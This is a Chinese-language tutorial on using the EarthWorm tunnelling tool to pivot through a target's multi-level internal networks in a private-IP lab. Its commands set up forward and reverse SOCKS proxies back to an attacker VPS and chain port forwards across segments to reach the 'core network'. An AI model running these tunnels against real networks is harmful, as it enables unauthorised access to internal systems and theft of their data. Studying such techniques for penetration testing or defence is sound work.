0x01 ew 快速穿透目標多級內(nèi)網(wǎng):
簡要環(huán)境說明:
1、win2008R2 假設(shè)為目標邊界web服務器,可正常訪問公網(wǎng)假設(shè)其公網(wǎng)
2、ip為 192.168.3.23
3 、假設(shè)其內(nèi)網(wǎng)ip為 192.168.32.131
1、 win2008 假設(shè)為目標內(nèi)網(wǎng)數(shù)據(jù)庫服務器,可正常訪問公網(wǎng)
2、假設(shè)其內(nèi)網(wǎng)ip為 192.168.32.170
1、win7 假設(shè)為自己公網(wǎng)的vps
2 、假設(shè)其公網(wǎng)ip為 192.168.3.232
1、centos 5.1 假設(shè)為目標內(nèi)網(wǎng)的一臺linux機器,沒有dns不能訪問公網(wǎng)
2、 假設(shè)其內(nèi)網(wǎng)ip為 192.168.32.169
0x02 首先,利用ew做最簡單的正向代理,其實就是大家最常用的所謂的ss:
在 win2008R2 機器上執(zhí)行
1、# ew_for_Win.exe -s ssocksd -l 1080
在win7上打開Proxifier根據(jù)上面監(jiān)聽的端口建立正常的socks代理即可
0x03 假設(shè)目標機器就直接處在內(nèi)網(wǎng)[沒有公網(wǎng)ip,但可以訪問公網(wǎng)],我們也可以利用ew進行反向socks5代理,然后直接在vps上就可以很方便的訪問目標內(nèi)網(wǎng)中的所有機器了:
先在 win7上執(zhí)行,等待目標反彈連接
1、# ew_for_Win.exe -s rcsocks -l 1080 -e 1234
在 win2008上執(zhí)行,反彈socks5連接
1、# ew_for_Win.exe -s rssocks -d 192.168.3.232 -e 1234
0x04 實現(xiàn)復雜內(nèi)網(wǎng)環(huán)境下的跨網(wǎng)段多級穿透:
第一種場景,內(nèi)網(wǎng)機器不能訪問公網(wǎng),可通過能訪問公網(wǎng)的機器把內(nèi)網(wǎng)不能訪問公網(wǎng)機器帶出來,比較簡單,如下:
1、假設(shè)win2008處在目標內(nèi)網(wǎng)且不能訪問公網(wǎng)但可以訪問內(nèi)網(wǎng)中的資源
2、而win2008R2這臺機器上雖然有內(nèi)網(wǎng)ip,但不能訪問內(nèi)網(wǎng)資源,好在win2008R2可以訪問win2008
3、這時我們想獲取內(nèi)網(wǎng)資源就可以這樣干,先在win2008上開啟socks代理服務,然后再在DMZ的win2008R2連上內(nèi)網(wǎng)的win2008的socks服務
4 、最后,通過win2008上的socks服務我們就可以輕松訪問目標內(nèi)網(wǎng)中的各種資源了,具體實現(xiàn)過程如下
首先,在win2008上執(zhí)行,意思就是在本地建立socks5代理,端口為1080
1、# ew_for_Win.exe -s ssocksd -l 1080
在到DMZ的win2008R2上執(zhí)行,意思就是把來自外部的1090端口的流量轉(zhuǎn)到內(nèi)網(wǎng)192.168.32.170這臺機器的1080端口上
1、# ew_for_Win.exe -s lcx_tran -l 1090 -f 192.168.32.170 -g 1080
最后,再回到win7[vps]上去利用Proxifier建立正常的socks代理訪問1090端口即可,訪問vps的1090就相當于訪問內(nèi)網(wǎng)win2008的1080端口
第二種場景,還是有些機器不能訪問公網(wǎng)的情況:
1、假設(shè)win2008在內(nèi)網(wǎng)且能訪問公網(wǎng)但不能訪問內(nèi)網(wǎng)資源,而centos 5.1能訪問內(nèi)網(wǎng)資源但卻無法訪問公網(wǎng),而win2008可以訪問centos 5.1
2、這試,我們要想獲取內(nèi)網(wǎng)資源,就可以通過win2008在centos 5.1和win7[vps]之間建立一條socks5通道,實現(xiàn)過程比較簡單,如下
首先,在win7[實際中的vps]上執(zhí)行,把來自外部的1080端口的流量轉(zhuǎn)到本地的1379端口上
1、# ew_for_Win.exe -s lcx_listen -l 1080 -e 1379
此時回到centos 5.1上執(zhí)行,在本地啟動socks5代理并監(jiān)聽2345端口
1、# chmod +x ew_for_Linux32
2、# ./ew_for_Linux32 -s ssocksd -l 2345
然后再到win2008上去執(zhí)行,意思就是把win7[vps]的1379端口和centos 5.1的2345進行綁定,即建立socks5通道
1、# ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1379 -f 192.168.32.169 -g 2345
最后,在回到win7[vps]建立正常的socks代理訪問即可,實際上就相當于訪問win7的1080就相當于訪問centos 5.1的2345端口,通過這種方式一樣也可以把整個目標內(nèi)網(wǎng)代理出來
第三種場景,多級內(nèi)網(wǎng)輕松穿透:
1、假設(shè)win2008R2在內(nèi)網(wǎng)[無公網(wǎng)ip]并在一個獨立的內(nèi)網(wǎng)段,win2008也處在目標內(nèi)網(wǎng),假設(shè)在另一個內(nèi)網(wǎng)段,centos 5.1同樣也處在內(nèi)網(wǎng),可又在另一個單獨的內(nèi)網(wǎng)段
2、且win2008R2能訪問win2008,win2008能訪問centos 5.1,而centos 5.1能訪問目標核心網(wǎng),要實現(xiàn)層層穿透,訪問到核心網(wǎng)資源,我們就可以這樣
先在win7[vps]上執(zhí)行,把來自外部的1080端口流量轉(zhuǎn)到本地的1235端口上
1、# ew_for_Win.exe -s rcsocks -l 1080 -e 1235
在win2008R2上執(zhí)行,把win7[vps]的1235端口和內(nèi)網(wǎng)win2008的3456端口綁定
1、# ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1235 -f 192.168.32.170 -g 3456
在win2008上執(zhí)行,將來自外部的1236端口和本地的3456端口進行綁定
1、# ew_for_Win.exe -s lcx_listen -l 3456 -e 1236
在centos 5.1上執(zhí)行,將本地的socks連接反彈到win2008的1236端口上,此時再回到win2008上看會提示”rssocks cmd_socket OK!”,說明通道已經(jīng)建立成功
1、# ./ew_for_Linux32 -s rssocks -d 192.168.32.170 -e 1236
最后,再回到win7[vps]上利用Proxifier訪問本地的1080就相當于訪問centos 5.1的1236端口,即可輕松獲取核心網(wǎng)的數(shù)據(jù)
一點小結(jié):
關(guān)于ew,想必經(jīng)常搞內(nèi)網(wǎng)的朋友,都已經(jīng)非常熟練了,這里也就不廢話了,其實,關(guān)于ew本身在實戰(zhàn)中還是比較實用的,在此也非常感謝作者的無私貢獻,真心希望國內(nèi)能多一些這樣的人,總體來講,在工具使用上并沒有太多技術(shù)含量,關(guān)鍵還是要你自己根據(jù)目標的實際內(nèi)網(wǎng)環(huán)境仔細弄清楚數(shù)據(jù)流向再針對性的用,上面一些簡單應用場景中,表面看著貌似挺復雜的,其實真正理解以后,都非常簡單,深刻搞清楚這些最基本的東西你才有可能靈活應用,什么都是如此,總是停留在’用’別人的工具上,自己沒有一點兒的獨立分析和想法,是很難有長進的,后續(xù)有空會再簡單介紹下關(guān)于Termite跳板機使用